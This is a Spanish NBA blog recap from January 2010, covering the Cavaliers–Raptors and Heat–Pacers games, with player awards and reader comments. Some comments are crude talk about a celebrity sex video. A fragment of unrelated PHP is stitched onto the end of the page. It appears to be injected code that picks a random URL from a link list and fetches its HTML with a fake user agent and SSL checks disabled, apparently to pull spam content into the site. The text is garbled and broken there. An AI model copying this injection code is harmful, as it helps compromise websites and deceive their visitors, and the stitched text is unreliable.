La Crónica (19/01/10)

20 de January de 2010 por txusma

Hay días que incluso se agradece un poco de calma en el torbellino en que se convierte normalmente la NBA. Ayer se jugaron tan solo 2 partidos con victorias de los favoritos.

En Cleveland el protagonismo por una vez no fue para Lebron James sino para el mediático fichado este año. Shaquille O’Neal se convirtió en el quinto jugador de la historia que llega a los 28.000 puntos y como comentó ayer él mismo: “Si hubiera metido la mitad de los tiros libres que he intentado a lo mejor llevaba ya 30.000 puntos”. Pues sí, Shaq. A lo mejor si te hubieras esforzado un poco más serías un poco más grande de lo que ya eres.

La cuestión es que los Cavs se impusieron a los Raptors con una buena defensa en el último cuarto. Lebron, tal vez movido por la envidia de verse apartado de los flashes, se marcó unos cuantos mates dignos de concurso y todo volvió a la normalidad.

Miami lo tuvo muchísimo más fácil ante los Pacers y no tuvo que sudar absolutamente nada para llevarse la victoria. Wade se marcó 32 puntos en 31 minutos aprovechando la dévil defensa de Indiana y Beasley uno de esos 20-10 que quedan tan bonitos en los BoxScore. Enfrente, Danny Granger cuajó uno de los peores partidos de su carrera y Brandon Rush fue el mejor del equipo.

PREMIOS

MVP: Lebron James se quedó a un solo rebote de su enésimo triple-doble (28-9-11) aunque falló los 7 triples que intentó. Cuando no entran, no entran.

Rookie: Ayer a DeRozan le tocó bailar con la más fea. Pero no la más fea del baile sinó la más fea de todo el pueblo. Aun así tuvo fuerzas para anotar 14 puntitos en ataque

Sorpresa: Yo era de los que esperaban muchísimo más de Brandon Rush este año pero lamentablemente he de calificar como sorpresa partidos suyos como el de ayer. 17 puntos y 10 rebotes para él.

Decepción: Uff… Un 2 de 16 es, sin duda, un porcentaje espeluznante. Mucho peor que el 3 de 11 de Troy Murphy. Por el bien de los Pacers, más vale que Danny Granger se recupere rápidamente de semejante actuación.

Esfuerzo en vano: Chris Bosh se marcó un buen partido y fue la principal amenaza para los Cavs. Acabó con 21 puntos y 10 rebotes, con un segundo cuarto fantástico en el que se fue a los 12 puntos.

Comenta

7 comentarios a esta entrada

  1. Love Denise dice:
    #1

    ojo al 1 de 6 de turkoglu, sobre o’neal, pienso que será muy dificil ver a otro pivot tan dominante y demoledor a corto plazo, howard es una bestia pero no tan dominante como fue Shaq, Bynum es bastante blando y Oden dudo que juegue a un gran nivel despues de tan graves lesiones.

      Citar

  2. danicarba dice:
    #2

    Odom está acabado, lamentablemente. Un jugador que tiene tantos problemas físicos desde el comienzo de su carrera no puede acabar bien. Y a ver q pasa con B Griffin que lleva el mismo camino que el pobre de Greg… Yo creo que toda esta gente se destroza las articulaciones en sus periplos universitarios para agarrar un buen contrato… y luego pasa lo q pasa. Shaquile no tiene ni tendrá parangón en mucho tiempo.

      Citar

  3. HeiNeKeN dice:
    #3

    danicarba, supongo que te refieres a Oden y no a Odom xD

    Respecto a lo dicho por Shaq, si hubiese tenido mejores porcentajes de tiro libre no habria recibido tantisimas faltas hechas solo para parar el juego de su equipo y a el mismo enviandolo a la linea de tiros libres…

      Citar

  4. Moman dice:
    #4

    Reconociendo el mal momento que existe de pivots en la nba en estos momentos, creo que hay centers que pueden dominar la liga (no sé si hasta el punto de Shaq) pero por lo menos apuntan maneras como pueden ser el propio Howard, Speights o Hibbert entre otros (ojo al último que se zampó en su día a howard con patatas)

      Citar

  5. danicarba dice:
    #5

    Efectivamente, pasa que no me puedo quitar de la cabeza a Khloe Kardashian… y no acabo de entender el por qué. Nos deleitara Lamar Odom con una nueva entrega de la versión pornográfica de la pequeña de los Kardashian? SI es así, Lamar for MVP.
    Tonterçias a parte, me referia a Greg Oden. Perdonad la errata

      Citar

  6. Love Denise dice:
    #6

    danicarba, la khloe tampoco está como para comerse la cabeza por ella, yo la veo hasta feilla, la hermana está mejor, aunque para gustos los colores. Pero como Denise no hay ninguna de hermosa.

      Citar

  7. danicarba dice:
    #7

    La verdad es q no sé a que Denise te refieres, pero yo me refería a alguna de las kardashian q era amiga de la Paris y que le hizo competencia en Internet comiendo cebolleta… claro que tampoco me fije cuál de las dos era, la verdad. Así a todo era una excusa más o menos mala al error cometido en el primer post. Ya decía yo que Lamar no podía estar casado con una pedazo puta de alto standing… con la hermana si que ya tiene un pase. Volvamos al Basquet por favor, parecemos dos presidiarios enajenados hablando de videos con mas de una pelota, y encima peluda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>